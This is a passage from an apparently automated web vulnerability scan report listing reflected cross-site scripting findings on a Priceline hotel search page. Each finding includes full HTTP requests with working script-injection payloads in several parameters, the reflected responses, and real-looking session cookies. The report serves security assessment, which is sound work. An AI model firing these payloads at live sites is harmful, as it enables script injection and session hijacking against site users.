Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="hotelBrand" value="29ff7"style="x:expression(alert(1))"82960f0a095"/>
...[SNIP]...
4.128. http://travela.priceline.com/hotel/searchHotels.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0297"style%3d"x%3aexpression(alert(1))"aedf6b2132a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0297"style="x:expression(alert(1))"aedf6b2132a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A&e0297"style%3d"x%3aexpression(alert(1))"aedf6b2132a=1 HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:45:22 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a201110030045223ae011572881; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A45%3A22&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:45:22 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8750
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="e0297"style="x:expression(alert(1))"aedf6b2132a" value="1"/>
...[SNIP]...
4.129. http://travela.priceline.com/hotel/searchHotels.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b8ab"><script>alert(1)</script>2b9240160eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 286
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand=&2b8ab"><script>alert(1)</script>2b9240160eb=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:19:19 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a20111003001919c5e011712643; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A19%3A19&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:19:19 GMT; Path=/
Set-Cookie: JSESSIONID=A5DE3817EF386B221CA4ABD0FE39259E; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8982
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="2b8ab"><script>alert(1)</script>2b9240160eb" value="1"/>
...[SNIP]...
4.130. http://travela.priceline.com/hotel/searchHotels.do [numberOfRooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the numberOfRooms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd99f"style%3d"x%3aexpression(alert(1))"2bc29a6757e was submitted in the numberOfRooms parameter. This input was echoed as bd99f"style="x:expression(alert(1))"2bc29a6757e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1bd99f"style%3d"x%3aexpression(alert(1))"2bc29a6757e&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:42:56 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5064010a20111003004256877011587358; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A42%3A56&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:42:56 GMT; Path=/
Set-Cookie: JSESSIONID=69CCD8D0CD8EEF485DD6617962BF3357; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8720
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="numberOfRooms" value="1bd99f"style="x:expression(alert(1))"2bc29a6757e"/>
...[SNIP]...
4.131. http://travela.priceline.com/hotel/searchHotels.do [numberOfRooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the numberOfRooms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d44fc"style%3d"x%3aexpression(alert(1))"74199effe499a77bf was submitted in the numberOfRooms parameter. This input was echoed as d44fc"style="x:expression(alert(1))"74199effe499a77bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1d44fc"style%3d"x%3aexpression(alert(1))"74199effe499a77bf&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:17:54 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a4663010a201110030017545d2011734785; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A17%3A54&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:17:54 GMT; Path=/
Set-Cookie: JSESSIONID=6C322477FCDDB42D9406EFC2F24445EF; Path=/hotel
Vary: Accept-Encoding
Content-Length: 9006
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="numberOfRooms" value="1d44fc"style="x:expression(alert(1))"74199effe499a77bf"/>
...[SNIP]...
4.132. http://travela.priceline.com/hotel/searchHotels.do [otherCityName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the otherCityName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82227"style%3d"x%3aexpression(alert(1))"87e976f77a3f47fe8 was submitted in the otherCityName parameter. This input was echoed as 82227"style="x:expression(alert(1))"87e976f77a3f47fe8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States82227"style%3d"x%3aexpression(alert(1))"87e976f77a3f47fe8&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:17:03 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5463010a201110030017035aa011737985; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A17%3A03&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:17:03 GMT; Path=/
Set-Cookie: JSESSIONID=4B6C5D44D13501B0C968A11FCE810B02; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8919
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="otherCityName" value="Boston,United States82227"style="x:expression(alert(1))"87e976f77a3f47fe8"/>
...[SNIP]...
4.133. http://travela.priceline.com/hotel/searchHotels.do [passingValues parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the passingValues request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9e1d"style%3d"x%3aexpression(alert(1))"124d58d7924 was submitted in the passingValues parameter. This input was echoed as d9e1d"style="x:expression(alert(1))"124d58d7924 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YESd9e1d"style%3d"x%3aexpression(alert(1))"124d58d7924&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:44:52 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5064010a201110030044528e8011589182; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A44%3A52&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:44:52 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8689
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="passingValues" value="YESd9e1d"style="x:expression(alert(1))"124d58d7924"/>
...[SNIP]...
4.134. http://travela.priceline.com/hotel/searchHotels.do [plf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99caf"style%3d"x%3aexpression(alert(1))"833635bc1c4 was submitted in the plf parameter. This input was echoed as 99caf"style="x:expression(alert(1))"833635bc1c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh99caf"style%3d"x%3aexpression(alert(1))"833635bc1c4&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:52 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a4663010a20111003004152fbd011596863; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A41%3A52&ID=AWAYNETWORK&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:41:52 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8703
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="plf" value="pclh99caf"style="x:expression(alert(1))"833635bc1c4"/>
...[SNIP]...
4.135. http://travela.priceline.com/hotel/searchHotels.do [plf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d85"style%3d"x%3aexpression(alert(1))"a198d7f06731f0eda was submitted in the plf parameter. This input was echoed as 64d85"style="x:expression(alert(1))"a198d7f06731f0eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln64d85"style%3d"x%3aexpression(alert(1))"a198d7f06731f0eda&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
